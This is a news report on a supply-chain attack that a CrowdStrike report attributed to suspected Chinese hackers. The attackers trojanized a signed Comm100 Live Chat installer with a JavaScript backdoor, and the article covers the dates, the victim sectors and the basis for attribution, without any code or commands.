Suspected Chinese hackers have hijacked installer for widely used software to distribute malware in what appears to be a supply chain attack similar to the SolarWinds compromise, a new report from cybersecurity firm CrowdStrike revealed.
The attack targeted Vancouver-based customer service company Comm100, which provides chat services on websites and social media. The hacking campaign involved malware that was deployed via a trojanized installer for the Comm100 Live Chat app signed using a valid Comm100 certificate dated September 26, 2022. According to Comm100’s website, the company claims to have more than 15,000 customers in 51 countries.
The installer is an Electron application that contains a JavaScript (JS) backdoor within the file main.js of the embedded Asar archive. This backdoor downloads and executes a second-stage script, which provides the threat actor with remote shell that allows to install additional malware.
According to CrowdStrike, the attack occurred from at least September 27, 2022 through the morning of September 29, 2022. Organizations affected include companies in the industrial, healthcare, technology, manufacturing, insurance and telecommunications sectors in North America and Europe. Although CrowdStrike did not reveal how many companies were hit, people familiar with the situation cited a dozen known victims.
The researchers believe that a Chinese threat actor was responsible for this attack based on several factors, such as the “presence of Chinese-language comments in the malware,” the use of Alibaba infrastructure to host C2 servers, and the use of tactics, techniques and procedures (TTPs) linked to previous attacks “targeting of online gambling entities in East and Southeast Asia” that has long been the area of interest for Chinese hackers.